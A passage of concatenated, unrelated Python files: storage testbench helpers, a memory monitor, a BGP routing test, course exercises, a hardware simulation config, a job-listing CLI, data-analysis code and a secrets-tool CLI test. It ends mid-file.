get_object(bucket_name, object_name, default_value): """Find an object in the global collection, return a default value if not found. :param bucket_name:str the name of the Bucket that contains the object. :param object_name:str the name of the Object. :param default_value:GcsObject the default value returned if the object is not found. :return: tuple the object path and the object. :rtype: (str,GcsObject) """ object_path = bucket_name + "/o/" + object_name return object_path, GCS_OBJECTS.get(object_path, default_value) def insert_object(object_path, value): """Insert an object to the global collection.""" GCS_OBJECTS[object_path] = value def delete_object(object_path): """Delete an object from the global collection.""" GCS_OBJECTS.pop(object_path) def all_objects(): """Return a key,value iterator for all the objects in the global collection. :rtype:dict[str, GcsBucket] """ return GCS_OBJECTS.items() def parse_part(multipart_upload_part): """Parse a portion of a multipart breaking out the headers and payload. :param multipart_upload_part:str a portion of the multipart upload body. :return: a tuple with the headers and the payload. 
:rtype: (dict, str) """ headers = dict() index = 0 next_line = multipart_upload_part.find(b"\r\n", index) while next_line != index: header_line = multipart_upload_part[index:next_line] key, value = header_line.split(b": ", 2) # This does not work for repeated headers, but we do not expect # those in the testbench. headers[key.decode("utf-8")] = value.decode("utf-8") index = next_line + 2 next_line = multipart_upload_part.find(b"\r\n", index) return headers, multipart_upload_part[next_line + 2 :] def parse_multi_part(request): """Parse a multi-part request :param request:flask.Request multipart request. :return: a tuple with the resource, media_headers and the media_body. :rtype: (dict, dict, str) """ content_type = request.headers.get("content-type") if content_type is None or not content_type.startswith("multipart/related"): raise error_response.ErrorResponse( "Missing or invalid content-type header in multipart upload" ) _, _, boundary = content_type.partition("boundary=") if boundary is None: raise error_response.ErrorResponse( "Missing boundary (%s) in content-type header in multipart upload" % boundary ) boundary = bytearray(boundary, "utf-8") marker = b"--" + boundary + b"\r\n" body = extract_media(request) parts = body.split(marker) # parts[0] is the empty string, `multipart` should start with the boundary # parts[1] is the JSON resource object part, with some headers resource_headers, resource_body = parse_part(parts[1]) # parts[2] is the media, with some headers media_headers, media_body = parse_part(parts[2]) end = media_body.find(b"\r\n--" + boundary + b"--\r\n") if end == -1: raise error_response.ErrorResponse( "Missing end marker (--%s--) in media body" % boundary ) media_body = media_body[:end] resource = json.loads(resource_body) return resource, media_headers, media_body def reset_connection(request): client = request.environ["CUSTOM_CONNECTION"] client.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0)) client.close() raise BaseException("Forced a connect reset.") #!/usr/bin/python import argparse import subprocess as sub from datetime import datetime import time def parse_args(): parser = argparse.ArgumentParser() parser.add_argument('process',type=str, help='the name of the process to track') parser.add_argument('-o','--output',type=str,default='', help='filename of the log') parser.add_argument('-s','--sleep',type=int,default=10, help='sleep time per cycle, in seconds') return parser.parse_args() # Determine the list of process ID's (PID) that belong to processes # by a given name def get_pids(process): try: output = sub.check_output(['pgrep','-f', process]).split(b'\n') pidlist = [ x.decode('utf-8') for x in output] except sub.CalledProcessError: pidlist = [] #print 'list of PIDs = ' + ', '.join(str(e) for e in pidlist) return pidlist # use the python script "ps_mem" to determine the exact about of RAM # being used by a given process in Bytes. def get_raw_mem(pid): try: #print(pid) mem = sub.check_output(['sudo','ps_mem', '-p', pid, '-t']).decode('utf-8') except sub.CalledProcessError: mem = '-1' return mem # Start an ongoing process that tracks RAM usage # of any processes with a given name "process" # and stores the results to a logfile. # Continues indefinitely until the process dies. 
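# Hypothetical usage sketch (not part of the original script): with 'pgrep' and the 'ps_mem'
# helper available (as used by get_pids/get_raw_mem above), a call such as
#   monitor_process('neo4j', output='neo4j_mem.log', sleep=30)
# would append one timestamped RAM sample per cycle to the log until the process exits.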
def monitor_process(process,output='',sleep=10): if len(output)==0: output = '{p}_mem.log'.format(p=process) print(output) quit=False with open(output, 'a', buffering=1) as f: while not quit: pids = get_pids(process) if 0 == len(pids): quit=True print('Process '+ process + ' no longer exists!' ) return None msg = datetime.now().strftime("%m/%d/%Y,%H:%M:%S") + \ " "+pids[0]+" "+str(get_raw_mem(pids[0])) #print(msg) f.write(msg+'\n') time.sleep(sleep) def main(): args = parse_args() #sub.Popen(['pgrep', args.process]) #sudo pgrep -f neo4j monitor_process(args.process, args.output, args.sleep) if __name__ == "__main__": main() 0 #!/usr/bin/env python # # Copyright (c) 2021 by # <> # # Permission to use, copy, modify, and/or distribute this software # for any purpose with or without fee is hereby granted, provided # that the above copyright notice and this permission notice appear # in all copies. # # THE SOFTWARE IS PROVIDED "AS IS" AND NETDEF DISCLAIMS ALL WARRANTIES # WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF # MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NETDEF BE LIABLE FOR # ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY # DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, # WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS # ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE # OF THIS SOFTWARE. # """ Test if 172.16.255.254/32 tagged with BLACKHOLE community is not re-advertised downstream outside local AS. """ import os import sys import json import pytest import functools CWD = os.path.dirname(os.path.realpath(__file__)) sys.path.append(os.path.join(CWD, "../")) # pylint: disable=C0413 from lib import topotest from lib.topogen import Topogen, TopoRouter, get_topogen from lib.common_config import step pytestmark = [pytest.mark.bgpd] def build_topo(tgen): for routern in range(1, 5): tgen.add_router("r{}".format(routern)) switch = tgen.add_switch("s1") switch.add_link(tgen.gears["r1"]) switch.add_link(tgen.gears["r2"]) switch = tgen.add_switch("s2") switch.add_link(tgen.gears["r2"]) switch.add_link(tgen.gears["r3"]) switch = tgen.add_switch("s3") switch.add_link(tgen.gears["r2"]) switch.add_link(tgen.gears["r4"]) def setup_module(mod): tgen = Topogen(build_topo, mod.__name__) tgen.start_topology() router_list = tgen.routers() for i, (rname, router) in enumerate(router_list.items(), 1): router.load_config( TopoRouter.RD_ZEBRA, os.path.join(CWD, "{}/zebra.conf".format(rname)) ) router.load_config( TopoRouter.RD_BGP, os.path.join(CWD, "{}/bgpd.conf".format(rname)) ) tgen.start_router() def teardown_module(mod): tgen = get_topogen() tgen.stop_topology() def test_bgp_blackhole_community(): tgen = get_topogen() if tgen.routers_have_failure(): pytest.skip(tgen.errors) def _bgp_converge(): output = json.loads( tgen.gears["r2"].vtysh_cmd("show ip bgp 172.16.255.254/32 json") ) expected = {"paths": [{"community": {"list": ["blackhole", "noExport"]}}]} return topotest.json_cmp(output, expected) def _bgp_no_advertise_ebgp(): output = json.loads( tgen.gears["r2"].vtysh_cmd( "show ip bgp neighbor r2-eth1 advertised-routes json" ) ) expected = { "advertisedRoutes": {}, "totalPrefixCounter": 0, "filteredPrefixCounter": 0, } return topotest.json_cmp(output, expected) def _bgp_no_advertise_ibgp(): output = json.loads( tgen.gears["r2"].vtysh_cmd( "show ip bgp neighbor r2-eth2 advertised-routes json" ) ) expected = { "advertisedRoutes": {"172.16.255.254/32": {}}, "totalPrefixCounter": 2, } return topotest.json_cmp(output, 
expected) test_func = functools.partial(_bgp_converge) success, result = topotest.run_and_expect(test_func, None, count=60, wait=0.5) assert result is None, 'Failed bgp convergence in "{}"'.format(tgen.gears["r2"]) step("Check if 172.16.255.254/32 is not advertised to eBGP peers") test_func = functools.partial(_bgp_no_advertise_ebgp) success, result = topotest.run_and_expect(test_func, None, count=60, wait=0.5) assert ( result is None ), 'Advertised blackhole tagged prefix to eBGP peers in "{}"'.format( tgen.gears["r2"] ) step("Check if 172.16.255.254/32 is advertised to iBGP peers") test_func = functools.partial(_bgp_no_advertise_ibgp) success, result = topotest.run_and_expect(test_func, None, count=60, wait=0.5) assert ( result is None ), 'Withdrawn blackhole tagged prefix to iBGP peers in "{}"'.format( tgen.gears["r2"] ) if __name__ == "__main__": args = ["-s"] + sys.argv[1:] sys.exit(pytest.main(args)) CS/CSC148/exercises/ex2/ex2.py """CSC148 Exercise 2: Inheritance and Introduction to Stacks === CSC148 Fall 2016 === , , and Department of Computer Science, University of Toronto === Module description === This file contains starter code for Exercise 2. It is divided into two parts: - Task 1, which contains a set of classes that build on your work from last week - Task 2, which contains the skeleton of a simple function involving a Stack data structure. Notes: 1. When you override a method, you generally do not need to include a method docstring, unless there are subclass-specific details to describe. While PyCharm will complain about a missing docstring, you may ignore this warning *for this specific case*. 2. A lot of starter code has been provided! Read through it carefully before starting. You may also find it interesting to compare our work against what you did for Exercise 1. """ # You will find these imports useful. Please do not import any others, # or python_ta will deduct marks. from math import sqrt # sqrt used to calculate diagonal distances import random # used to generate random numbers ############################################################################## # Task 1: Cars and other vehicles ############################################################################## class SuperDuperManager: """A class responsible for keeping track of all cars in the system. """ # @param dict[str, Vehicle] _vehicles: # A map of unique string identifiers to the corresponding vehicles. # For example, _vehicles['a01'] would be a vehicle corresponding to # the id_ 'a01'. def __init__(self): """Initialize a new SuperDuperManager. Initially there are no vehicles in the system. @param SuperDuperManager self: @rtype: None """ self._vehicles = {} def add_vehicle(self, vehicle_type, id_, fuel): """Add a new vehicle to the system of the given type. The new vehicle is identified by the string <id_>, and has initial amount of fuel <fuel>. Do nothing if there is already a vehicle with the given id. Precondition: <vehicle_type> is one of 'Car', 'Helicopter', or 'UnreliableMagicCarpet'. @param SuperDuperManager self: @param str vehicle_type: @param str id_: @param int fuel: @rtype: None """ # Check to make sure the identifier isn't already used. if id_ not in self._vehicles: if vehicle_type == 'Car': self._vehicles[id_] = Car(fuel) elif vehicle_type == 'Helicopter': self._vehicles[id_] = Helicopter(fuel) elif vehicle_type == 'UnreliableMagicCarpet': self._vehicles[id_] = UnreliableMagicCarpet(fuel) def move_vehicle(self, id_, new_x, new_y): """Move a vehicle with the given id. 
The vehicle called <id_> should be moved to position (<new_x>, <new_y>). Do nothing if there is no vehicle with the given id, or if the corresponding vehicle does not have enough fuel to move. @param SuperDuperManager self: SuperDuperManager @param str id_: @param int new_x: @param int new_y: @rtype: None """ if id_ in self._vehicles: self._vehicles[id_].move(new_x, new_y) def get_vehicle_position(self, id_): """Return the position of the vehicle with the given id. Return a tuple of the (x, y) position of the vehicle. Return None if there is no vehicle with the given id. @param SuperDuperManager self: SuperDuperManager @param str id_: str @rtype: (int, int) | None """ if id_ in self._vehicles: return self._vehicles[id_].position def get_vehicle_fuel(self, id_): """Return the amount of fuel of the vehicle with the given id. Return None if there is no vehicle with the given id. @param SuperDuperManager self: @param str id_: @rtype: int | None """ if id_ in self._vehicles: return self._vehicles[id_].fuel class Vehicle: """ A superclass for a vehicle in the Super Duper system. Note that this interface specifies *two* public attributes, and *two* public methods (the constructor is not considered public). Of the public methods, a default implementation is given for move, but not fuel_needed. It also defines a constructor that should be called by each of its subclasses. === Attributes === @param tuple(int) position: The position of this vehicle. @param int fuel: The amount of fuel remaining for this vehicle. === Representation invariants === fuel >= 0 """ def __init__(self, new_fuel, new_position): """Initialize a new Vehicle with the given fuel and position. Precondition: new_fuel >= 0 @param Vehicle self: Vehicle itself @param int new_fuel: fuel amount @param (int, int) new_position: destination coordinates @rtype: None """ self.fuel = new_fuel self.position = new_position def fuel_needed(self, new_x, new_y): """Return how much fuel would be used to move to the given position. Note: the amount returned may be larger than self.fuel, indicating that this vehicle may not move to the given position. @param Vehicle self: Vehicle itself @param int new_x: destination's x coordinate @param int new_y: destination's y coordinate @rtype: float """ raise NotImplementedError def move(self, new_x, new_y): """Move this vehicle to a new position. Do nothing if this vehicle does not have enough fuel to move. @param Vehicle self: Vehicle itself @param int new_x: destination's x coordinate @param int new_y: destination's y coordinate @rtype: None """ needed = self.fuel_needed(new_x, new_y) if needed <= self.fuel: self.position = (new_x, new_y) self.fuel -= needed # TODO: Implement this class (you can use your work from Exercise 1) class Car(Vehicle): """A Car in the Super Duper system. A Car's original position is (0, 0). A Car can only move vertically and horizontally, and uses one unit of fuel per unit distance travelled. Do nothing if the Car does not have enough fuel to move. === Attributes === @param tuple(int) position: The position of this Car. @param int fuel: The amount of fuel remaining for this Car. === Representation invariants === fuel >= 0 """ def __init__(self, fuel, position=(0, 0)): """ Initialize a new Car with the given fuel and position. Precondition: fuel >= 0 @param Car self: Car itself. @param int fuel: fuel amount. @param (int, int) position: original position. 
@rtype: None """ Vehicle.__init__(self, fuel, position) def fuel_needed(self, new_x, new_y): """Return how much fuel would be used to move to the given position. Note: the amount returned may be larger than self.fuel, indicating that this Car may not move to the given position. @param Car self: Car itself. @param int new_x: destination's x coordinate @param int new_y: destination's y coordinate @rtype: float """ distance = abs(new_x - self.position[0]) + abs(new_y - self.position[1]) return distance # TODO: Implement this class. Note: We've imported the sqrt function for you. class Helicopter(Vehicle): """ A helicopter. Can travel diagonally between points. A Helicopter's original position is (3, 5). After each move, the remaining amount of fuel is rounded down to the nearest integer. Do nothing if the Helicopter does not have enough fuel to move. === Attributes === @param tuple(int) position: The position of this vehicle. @param int fuel: The amount of fuel remaining for this vehicle. === Representation invariants === fuel >= 0 """ def __init__(self, fuel, position=(3, 5)): """ Create a Helicopter with the given fuel amount and default position. Precondition: fuel >= 0 @param Helicopter self: Helicopter itself. @param int fuel: fuel amount. @param (int, int) position: original position. @rtype: None """ Vehicle.__init__(self, fuel, position) def fuel_needed(self, new_x, new_y): """Return how much fuel would be used to move to the given position. Note: the amount returned may be larger than self.fuel, indicating that this vehicle may not move to the given position. @param Helicopter self: Helicopter itself @param int new_x: destination's x coordinates @param int new_y: destination's y coordinates @rtype: float """ return sqrt((abs(new_x - self.position[0]))**2 + (abs(new_y - self.position[1]))**2) def move(self, new_x, new_y): """Move this Helicopter to a new position. Do nothing if this Helicopter does not have enough fuel to move. @param Helicopter self: Helicopter itself @param int new_x: destination's x coordinates @param int new_y: destination's y coordinates @rtype: None """ needed = self.fuel_needed(new_x, new_y) if needed <= self.fuel: self.position = (new_x, new_y) self.fuel = int(self.fuel - needed) # TODO: Implement this class. Note: We've imported the random module for you. class UnreliableMagicCarpet(Vehicle): """ An unreliable magic carpet. An UnreliableMagicCarpet is created at a random position (x, y), where x and y are integers between 0 and 10 inclusive. Does not need to use fuel to travel, but ends up in a random position within two horizontal and vertical units from the target destination. === Attributes === @param tuple(int) position: The position of this vehicle. @param int fuel: The amount of fuel remaining for this vehicle. """ def __init__(self, fuel, position=(random.randint(0, 10), random.randint(0, 10))): """ Create an UnreliableMagicCarpet with the given fuel amount and a random default position. """ Vehicle.__init__(self, fuel, position) def fuel_needed(self, new_x, new_y): """ Return how much fuel would be used to move to the given position. Note: the amount returned is always 0 since UnreliableMagicCarpet does not consume fuel. @param UnreliableMagicCarpet self: UnreliableMagicCarpet itself @param int new_x: destination's x coordinates @param int new_y: destination's y coordinates @rtype: int """ return 0 def move(self, new_x, new_y): """ Move this UnreliableMagicCarpet to a new position. Note: The UnreliableMagicCarpet will move to a random position around the target one. 
@param UnreliableMagicCarpet self: UnreliableMagicCarpet itself @param int new_x: destination's x coordinates @param int new_y: destination's y coordinates @rtype: None """ needed = self.fuel_needed(new_x, new_y) if needed <= self.fuel: dx = random.randint(-2, 2) dy = random.randint(-2, 2) self.position = (new_x + dx, new_y + dy) ############################################################################## # Task 2: Introduction to Stacks ############################################################################## def reverse_top_two(stack): """Reverse the top two elements on . Precondition: has at least two items. @param Stack stack: @rtype: None >>> from obfuscated_stack import Stack >>> stack = Stack() >>> stack.add(1) >>> stack.add(2) >>> reverse_top_two(stack) >>> stack.remove() 1 >>> stack.remove() 2 """ # TODO: implement this function after you've read about Stacks. top_1 = stack.remove() top_2 = stack.remove() stack.add(top_1) stack.add(top_2) if __name__ == '__main__': # Run python_ta to ensure this module passes all checks for # code inconsistencies and forbidden Python features. # Useful for debugging! import python_ta python_ta.check_all(config='pylint.txt') # Uncomment and run before final submission. This checks for style errors # in addition to code inconsistencies and forbidden Python features. # python_ta.check_all(config='pylint.txt') import fbuild.builders.scala def build(ctx): scala = fbuild.builders.scala.Builder(ctx) lib = scala.build_lib('lib.jar', ['world.scala']) ctx.logger.log(' * running script.scala:') scala.run_script('script.scala', classpaths=[lib]) exe = scala.build_lib('exe.jar', ['compiled.scala'], classpaths=[lib]) ctx.logger.log(' * running %s:' % exe) scala.run_class('HelloWorld', classpaths=[lib, exe]) import os import random # https://github.com/NVIDIA/framework-determinism os.environ['TF_DETERMINISTIC_OPS'] = '1' import numpy as np import tensorflow as tf def set_seeds(my_seed=42): os.environ['PYTHONHASHSEED'] = str(my_seed) random.seed(my_seed) np.random.seed(my_seed) tf.random.set_seed(my_seed) tf.config.threading.set_intra_op_parallelism_threads(1) tf.config.threading.set_inter_op_parallelism_threads(1) Henrique-GM/Exercicios_de_Python numero = int(input('Digite um número inteiro: ')) contador = 0 for i in range(1, numero + 1): if numero % i == 0: contador += 1 if contador == 2: print('E primo') else: print('Não é primo') import jobui class JobSpider: def __init__(self): print("\n欢迎使用JobSpider,所有职位信息来自职友集!") def __del__(self): pass def run(self): # 实现主要逻辑 while True: choice = self.get_choice() if choice == 'query': # 查询职位信息 self.action_query() elif choice == 'exit': # 退出程序 exit() else: print("无效的指令!") # 查询职位信息 def action_query(self): print("查询职位信息,请输入有关参数:") job = input("职位名称(如'少儿编程'):").strip() city = input("城市名称(如'广州'):").strip() maxpagenum = int(input("最大爬取页数(0表示无限制):").strip()) print("\n") result = jobui.query(job, city, maxpagenum) print("\n") if result['state'] == 'success': print("统计信息({}个职位):".format(result['result']['quantity'])) print("\n") print("\t职位:{} 城市:{}".format(job, city)) print("\t" + "*" * 75 + "\n") # 分隔符 # 薪资 print("\t\t\t\t\t薪资分析") salary = [] salary.append(result['result']['salary']['avg']) salary.append(result['result']['salary']['0-5k']) salary.append(result['result']['salary']['5-10k']) salary.append(result['result']['salary']['10-20k']) salary.append(result['result']['salary']['20k+']) print("\t\t平均:{} 0-5k:{} 5-10k:{} 10-20k:{} 20k+:{}".format(salary[0], salary[1], salary[2], salary[3], salary[4])) # 学历 
print("\n\t\t\t\t\t最低学历") education = [] education.append(result['result']['education']['大专']) education.append(result['result']['education']['本科']) education.append(result['result']['education']['硕士']) print("\t\t\t\t大专:{} 本科:{} 硕士:{}".format(education[0], education[1], education[2])) print("\n\t" + "*" * 75) # 分隔符 # 清洗率 salary = result['result']['salary']['rate'] education = result['result']['education']['rate'] print("\t清洗率:薪资 {} 学历 {}".format(salary, education)) print("\n") else: print("查询职位信息失败,错误信息:{} {}".format(result['error']['position'], result['error']['message'])) print("\n") # 获得用户输入 def get_choice(self): self.show_menu() choice = input("\t\t请输入指令:").strip() print("\n") return choice # 显示功能菜单 def show_menu(self): print("\n\t\t\t\t功能菜单") print("\t\t" + "=" * 50 + "\n") # 功能列表 print("\t\t\t 1. 查询职位信息 【 query 】") print("\t\t\t 2. 退出程序 【 exit 】") print("\n\t\t" + "=" * 50) print("\t\t\t 【】中的内容为指令\n") job_spider = JobSpider() job_spider.run() # Automatically generated SST Python input import sst from mhlib import componentlist DEBUG_L1 = 0 DEBUG_MEM = 0 DEBUG_CORE = 0 DEBUG_NIC = 0 DEBUG_LEVEL = 10 debug_params = { "debug" : 0, "debug_level" : 10 } # On network: Core, L1, MMIO device, memory # Logical communication: Core->L1->memory # Core->MMIO # MMIO->memory core_group = 0 l1_group = 1 mmio_group = 2 memory_group = 3 core_dst = [l1_group, mmio_group] l1_src = [core_group] l1_dst = [memory_group] mmio_src = [core_group] mmio_dst = [memory_group] memory_src = [l1_group,mmio_group] # Constans shared across components network_bw = "25GB/s" clock = "2GHz" mmio_addr = 1024 # Define the simulation components cpu = sst.Component("cpu", "memHierarchy.standardCPU") cpu.addParams({ "opCount" : "1000", "memFreq" : "4", "memSize" : "1KiB", "mmio_freq" : 15, "mmio_addr" : mmio_addr, # Just above memory addresses "clock" : clock, "verbose" : 3, }) iface = cpu.setSubComponent("memory", "memHierarchy.standardInterface") iface.addParams(debug_params) cpu_nic = iface.setSubComponent("memlink", "memHierarchy.MemNIC") cpu_nic.addParams({"group" : core_group, "destinations" : core_dst, "network_bw" : network_bw}) #cpu_nic.addParams(debug_params) l1cache = sst.Component("l1cache", "memHierarchy.Cache") l1cache.addParams({ "access_latency_cycles" : "2", "cache_frequency" : clock, "replacement_policy" : "lru", "coherence_protocol" : "MSI", "associativity" : "4", "cache_line_size" : "64", "cache_size" : "2 KB", "L1" : "1", "addr_range_start" : 0, "addr_range_end" : mmio_addr - 1, "debug" : DEBUG_L1, "debug_level" : DEBUG_LEVEL }) l1_nic = l1cache.setSubComponent("cpulink", "memHierarchy.MemNIC") l1_nic.addParams({ "group" : l1_group, "sources" : l1_src, "destinations" : l1_dst, "network_bw" : network_bw}) #l1_nic.addParams(debug_params) mmio = sst.Component("mmio", "memHierarchy.mmioEx") mmio.addParams({ "verbose" : 3, "clock" : clock, "base_addr" : mmio_addr, }) mmio_iface = mmio.setSubComponent("iface", "memHierarchy.standardInterface") #mmio_iface.addParams(debug_params) mmio_nic = mmio_iface.setSubComponent("memlink", "memHierarchy.MemNIC") mmio_nic.addParams({"group" : mmio_group, "sources" : mmio_src, "destinations" : mmio_dst, "network_bw" : network_bw }) #mmio_nic.addParams(debug_params) chiprtr = sst.Component("chiprtr", "merlin.hr_router") chiprtr.addParams({ "xbar_bw" : "1GB/s", "id" : "0", "input_buf_size" : "1KB", "num_ports" : "4", "flit_size" : "72B", "output_buf_size" : "1KB", "link_bw" : "1GB/s", "topology" : "merlin.singlerouter" }) 
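# Added sketch (not part of the original SST script): each MemNIC above is
# configured with a "group" plus "sources"/"destinations" lists, and that is
# what encodes the logical paths (Core -> L1 -> memory and Core -> MMIO ->
# memory) over the single shared router. A hypothetical helper like the one
# below could cut the repetition; it only uses calls already present in this
# script (setSubComponent / addParams).
def make_memnic(parent, slot, group, network_bw, sources=None, destinations=None):
    """Attach a memHierarchy.MemNIC to `parent` on `slot` and set its routing params."""
    nic = parent.setSubComponent(slot, "memHierarchy.MemNIC")
    params = {"group": group, "network_bw": network_bw}
    if sources is not None:
        params["sources"] = sources
    if destinations is not None:
        params["destinations"] = destinations
    nic.addParams(params)
    return nic
# Example (equivalent to the l1_nic setup above):
# l1_nic = make_memnic(l1cache, "cpulink", l1_group, network_bw, sources=l1_src, destinations=l1_dst)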
chiprtr.setSubComponent("topology","merlin.singlerouter") memctrl = sst.Component("memory", "memHierarchy.MemController") memctrl.addParams({ "debug" : DEBUG_MEM, "debug_level" : DEBUG_LEVEL, "clock" : "1GHz", "addr_range_end" : mmio_addr - 1, }) mem_nic = memctrl.setSubComponent("cpulink", "memHierarchy.MemNIC") mem_nic.addParams({"group" : memory_group, "sources" : "[1,2]", # Group 1 = L1, Group 2 = MMIO "network_bw" : network_bw}) #mem_nic.addParams(debug_params) memory = memctrl.setSubComponent("backend", "memHierarchy.simpleMem") memory.addParams({ "access_time" : "100 ns", "mem_size" : "512MiB" }) # Enable statistics sst.setStatisticLoadLevel(7) sst.setStatisticOutput("sst.statOutputConsole") for a in componentlist: sst.enableAllStatisticsForComponentType(a) # Define the simulation links # cpu/cpu_nic # | # l1/l1_nic - chiprtr - mem_nic/mem # link_cpu_rtr = sst.Link("link_cpu") link_cpu_rtr.connect( (cpu_nic, "port", "1000ps"), (chiprtr, "port0", "1000ps") ) link_l1_rtr = sst.Link("link_l1") link_l1_rtr.connect( (l1_nic, "port", '1000ps'), (chiprtr, "port1", "1000ps") ) link_mmio_rtr = sst.Link("link_mmio") link_mmio_rtr.connect( (mmio_nic, "port", "500ps"), (chiprtr, "port2", "500ps")) link_mem_rtr = sst.Link("link_mem") link_mem_rtr.connect( (mem_nic, "port", "1000ps"), (chiprtr, "port3", "1000ps") ) 0 # -------------- #Header files import pandas as pd import numpy as np import matplotlib.pyplot as plt #path of the data file- path data=pd.read_csv(path) #Code starts here data['Gender'].replace('-','Agender',inplace=True) gender_count=data.Gender.value_counts() gender_count.plot(kind='Bar') # -------------- #Code starts here alignment=data.Alignment.value_counts() alignment.plot(kind='Bar') plt.xlabel('Character Alignment') # -------------- #Code starts here sc_df=data[['Strength','Combat']] sc_covariance=sc_df.cov().iloc[1,0].round(2) sc_strength=sc_df.Strength.std().round(2) sc_combat=sc_df.Combat.std().round(2) sc_pearson=(sc_covariance/(sc_strength*sc_combat)).round(2) ic_df=data[['Intelligence','Combat']] ic_covariance=ic_df.cov().iloc[1,0].round(2) ic_intelligence=ic_df.Intelligence.std().round(2) ic_combat=ic_df.Combat.std().round(2) ic_pearson=(ic_covariance/(ic_intelligence*ic_combat)).round(2) # -------------- #Code starts here total_high=data.Total.quantile(q=0.99) print(total_high) super_best=data[data['Total']>total_high] super_best_names=list(super_best['Name']) print(super_best_names) # -------------- #Code starts here fig,([ax_1,ax_2,ax_3])=plt.subplots(1,3,figsize=(10,15)) data['Intelligence'].plot(kind='box', ax=ax_1, legend=True) data['Speed'].plot(kind='box', ax=ax_2, legend=True) data['Power'].plot(kind='box', ax=ax_3, legend=True) #ax_1.set_xlabels('Intelligence') #ax_2=plt.boxplot(data.Speed) #ax_2.set_xlabels('Speed') #ax_3=plt.boxplot(data.Power) #ax_3.set_xlabels('Power') # -*- coding: utf-8 -*- from __future__ import unicode_literals import os import json import subprocess import ruamel.yaml from face import CommandChecker from pocket_protector import cli def test_prepare(): # confirms that all subcommands compile together nicely assert cli._get_cmd(prepare=True) return KURT_EMAIL = '' KURT_PHRASE = u'' MH_EMAIL = '' MH_PHRASE = 'thegame' DOMAIN_NAME = 'first-domain' SECRET_NAME = 'secret-name' SECRET_VALUE = u'secrët-value' # _fast_crypto from conftest def test_cli(tmp_path, _fast_crypto): cmd = cli._get_cmd() cc = CommandChecker(cmd, reraise=True) assert cc.run('pprotect version').stdout.startswith('pocket_protector version') tmp_path = str(tmp_path) 
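# Added note: pytest's tmp_path fixture is a pathlib.Path; it is converted to
# str above because the paths below are built with plain string concatenation
# and passed to the CLI commands as strings.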
protected_path = tmp_path + '/protected.yaml' # fail init and ensure that file isn't created cc.fail_1('pprotect init --file %s' % protected_path, input=[KURT_EMAIL, KURT_PHRASE, KURT_PHRASE + 'nope']) assert not os.path.exists(protected_path) # successfully create protected res = cc.run('pprotect init --file %s' % protected_path, input=[KURT_EMAIL, KURT_PHRASE, KURT_PHRASE]) assert res.stdout == 'Adding new key custodian.\nUser email: ' assert res.stderr == 'Passphrase: Retype passphrase: ' # check we can only create it once res = cc.fail_2('pprotect init --file %s' % protected_path, input=[KURT_EMAIL, KURT_PHRASE, KURT_PHRASE]) file_data = ruamel.yaml.YAML().load(open(protected_path).read()) assert list(file_data['key-custodians'])[0] == KURT_EMAIL assert len(file_data['audit-log']) == 2 res = cc.run('pprotect list-audit-log --file %s' % protected_path) audit_lines = res.stdout.splitlines() assert len(audit_lines) == 2 assert 'created' in audit_lines[0] # make a new cc, with env and tmp_path baked in (also tests # protected.yaml in the cur dir being the default file) kurt_env = {'PPROTECT_USER': KURT_EMAIL, 'PPROTECT_PASSPHRASE': KURT_PHRASE} cc = CommandChecker(cmd, chdir=tmp_path, env=kurt_env, reraise=True) res = cc.run(['pprotect', 'add-domain'], input=[DOMAIN_NAME]) assert 'Adding new domain.' in res.stdout res = cc.run(['pprotect', 'list_domains']) assert res.stdout.splitlines() == [DOMAIN_NAME] cc.run(['pprotect', 'add-secret'], input=[DOMAIN_NAME, SECRET_NAME, 'tmpval']) cc.run(['pprotect', 'update-secret'], input=[DOMAIN_NAME, SECRET_NAME, SECRET_VALUE]) res = cc.run(['pprotect', 'list-domain-secrets', DOMAIN_NAME]) assert res.stdout == SECRET_NAME + '\n' res = cc.run(['pprotect', 'decrypt-domain', DOMAIN_NAME]) res_data = json.loads(res.stdout) assert res_data[SECRET_NAME] == SECRET_VALUE cc.fail(['pprotect', 'decrypt-domain', 'nonexistent-domain']) # already exists cc.fail_1('pprotect add-key-custodian', input=[KURT_EMAIL, '']) cc.run('pprotect add-key-custodian', input=[MH_EMAIL, MH_PHRASE, MH_PHRASE]) cc.run('pprotect add-owner', input=[DOMAIN_NAME, MH_EMAIL]) # missing protected cc.fail_2('pprotect list-all-secrets', chdir=tmp_path + '/..') res = cc.run('pprotect list-all-secrets') assert '{}: {}\n'.format(SECRET_NAME, DOMAIN_NAME) == res.stdout cc.run(['pprotect', 'rotate_domain_keys'], input=[DOMAIN_NAME]) # test mixed env var and entry res = cc.run(['pprotect', 'decrypt-domain', DOMAIN_NAME], env={'PPROTECT_USER': MH_EMAIL, 'PPROTECT_PASSPHRASE': None}, input=[MH_PHRASE]) assert json.loads(res.stdout)[SECRET_NAME] == SECRET_VALUE assert 'Verify passphrase' in res.stderr # test bad creds cc.fail_1(['pprotect', 'decrypt-domain', DOMAIN_NAME], env={'PPROTECT_USER': None, 'PPROTECT_PASSPHRASE': 'nope'}, input=[KURT_EMAIL]) res = cc.fail_1('pprotect set-key-custodian-passphrase', input=[KURT_EMAIL, KURT_PHRASE, KURT_PHRASE, KURT_PHRASE + 'nope']) assert 'did not match' in res.stderr # correctly reset passphrase new_kurt_phrase = KURT_PHRASE + '' res = cc.run('pprotect set-key-custodian-passphrase', input=[KURT_EMAIL, KURT_PHRASE, new_kurt_phrase, new_kurt_phrase]) # try new passphrase with a passphrase file why not ppfile_path = str(tmp_path) + 'tmp_passphrase' with open(ppfile_path, 'wb') as f: f.write(new_kurt_phrase.encode('utf8')) res = cc.run(['pprotect', 'decrypt-domain', '--non-interactive', '--passphrase-file', ppfile_path, DOMAIN_NAME]) res_data = json.loads(res.stdout) assert res_data[SECRET_NAME] == SECRET_VALUE # test mutual exclusivity of check env and 
